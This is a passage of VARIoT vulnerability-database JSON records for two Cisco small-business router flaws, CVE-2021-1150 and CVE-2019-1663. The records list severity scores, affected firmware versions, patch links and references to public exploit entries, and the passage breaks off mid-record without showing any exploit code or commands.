                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-1150",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2021-1150",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1150",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1150",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1150",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-41150",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202101-1029",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-374204",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41150"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374204"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002712"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1029"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1150"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1150"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV A command injection vulnerability exists in the router.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1150"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002712"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41150"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374204"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1150",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002712",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41150",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.0143",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1029",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-374204",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41150"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374204"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002712"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1029"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1150"
          }
        ]
      },
      "id": "VAR-202101-0792",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41150"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374204"
          }
        ],
        "trust": 1.3577208514285712
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41150"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:51:05.536000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-command-inject-LBdQ2KRN",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-command-inject-LBdQ2KRN"
          },
          {
            "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W command injection vulnerability (CNVD-2021-41150)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/272266"
          },
          {
            "title": "Multiple Cisco Product Command Injection Vulnerability Fixes",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139528"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41150"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002712"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1029"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-20",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-374204"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002712"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1150"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.9,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-command-inject-lbdq2krn"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1150"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.0143/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41150"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374204"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002712"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1029"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1150"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41150"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374204"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002712"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1029"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1150"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41150"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374204"
          },
          {
            "date": "2021-09-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002712"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1029"
          },
          {
            "date": "2021-01-13T22:15:15.160000",
            "db": "NVD",
            "id": "CVE-2021-1150"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41150"
          },
          {
            "date": "2022-08-05T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374204"
          },
          {
            "date": "2021-09-29T06:59:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002712"
          },
          {
            "date": "2022-08-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1029"
          },
          {
            "date": "2024-11-21T05:43:41.937000",
            "db": "NVD",
            "id": "CVE-2021-1150"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1029"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Command injection vulnerability in router",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002712"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1029"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201902-0427

    Vulnerability from variot - Updated: 2024-11-23 21:37

    A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected. RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected. This issue is tracked by Cisco Bug ID CSCvn18638, CSCvn18639, CSCvn18642

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201902-0427",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv110w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.1"
          },
          {
            "model": "rv215w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.1"
          },
          {
            "model": "rv130w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.45"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "1.2.2.1"
          },
          {
            "model": "rv130w wireless-n multifunction vpn router",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "1.0.3.45"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "1.3.1.1"
          },
          {
            "model": "rv110w none",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w none",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w none",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "small business rv series routers",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.3.0.8"
          },
          {
            "model": "small business rv series routers",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.2.1.7"
          },
          {
            "model": "small business rv series routers",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0.1.2"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "rv130w wireless-n multifunction vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "small business rv series routers",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.3.1.1"
          },
          {
            "model": "small business rv series routers",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.2.2.1"
          },
          {
            "model": "small business rv series routers",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0.3.45"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.3.1.1"
          },
          {
            "model": "rv130w wireless-n multifunction vpn router",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0.3.45"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.2.2.1"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-05902"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-32613"
          },
          {
            "db": "BID",
            "id": "107185"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-002114"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1663"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130w_wireless-n_multifunction_vpn_router_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-002114"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Yu Zhang ????????Haoliang Lu ?? ??,the following security researchers: Yu Zhang and Haoliang Lu at the GeekPwn conference T. Shiomitsu of Pen Test Partners LLP",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201902-988"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-1663",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2019-1663",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2019-05902",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2022-32613",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-148795",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2019-1663",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2019-1663",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2019-1663",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2019-1663",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2019-1663",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-05902",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2022-32613",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201902-988",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-148795",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2019-1663",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-05902"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-32613"
          },
          {
            "db": "VULHUB",
            "id": "VHN-148795"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-1663"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-002114"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201902-988"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1663"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1663"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected. RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected. \nThis issue is tracked by Cisco Bug ID CSCvn18638, CSCvn18639, CSCvn18642",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-1663"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-002114"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-05902"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-32613"
          },
          {
            "db": "BID",
            "id": "107185"
          },
          {
            "db": "VULHUB",
            "id": "VHN-148795"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-1663"
          }
        ],
        "trust": 3.15
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=47348",
            "trust": 0.3,
            "type": "exploit"
          },
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-148795",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-148795"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-1663"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-1663",
            "trust": 4.1
          },
          {
            "db": "BID",
            "id": "107185",
            "trust": 2.7
          },
          {
            "db": "PACKETSTORM",
            "id": "152507",
            "trust": 1.2
          },
          {
            "db": "PACKETSTORM",
            "id": "154310",
            "trust": 1.2
          },
          {
            "db": "PACKETSTORM",
            "id": "153163",
            "trust": 1.2
          },
          {
            "db": "EXPLOIT-DB",
            "id": "46705",
            "trust": 1.2
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-002114",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-32613",
            "trust": 0.7
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201902-988",
            "trust": 0.7
          },
          {
            "db": "EXPLOITALERT",
            "id": "33303",
            "trust": 0.6
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-05902",
            "trust": 0.6
          },
          {
            "db": "NSFOCUS",
            "id": "42833",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2019.0622.2",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-148795",
            "trust": 0.1
          },
          {
            "db": "EXPLOIT-DB",
            "id": "47348",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-1663",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-05902"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-32613"
          },
          {
            "db": "VULHUB",
            "id": "VHN-148795"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-1663"
          },
          {
            "db": "BID",
            "id": "107185"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-002114"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201902-988"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-1663"
          }
        ]
      },
      "id": "VAR-201902-0427",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-05902"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2022-32613"
          },
          {
            "db": "VULHUB",
            "id": "VHN-148795"
          }
        ],
        "trust": 2.0267129244444444
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
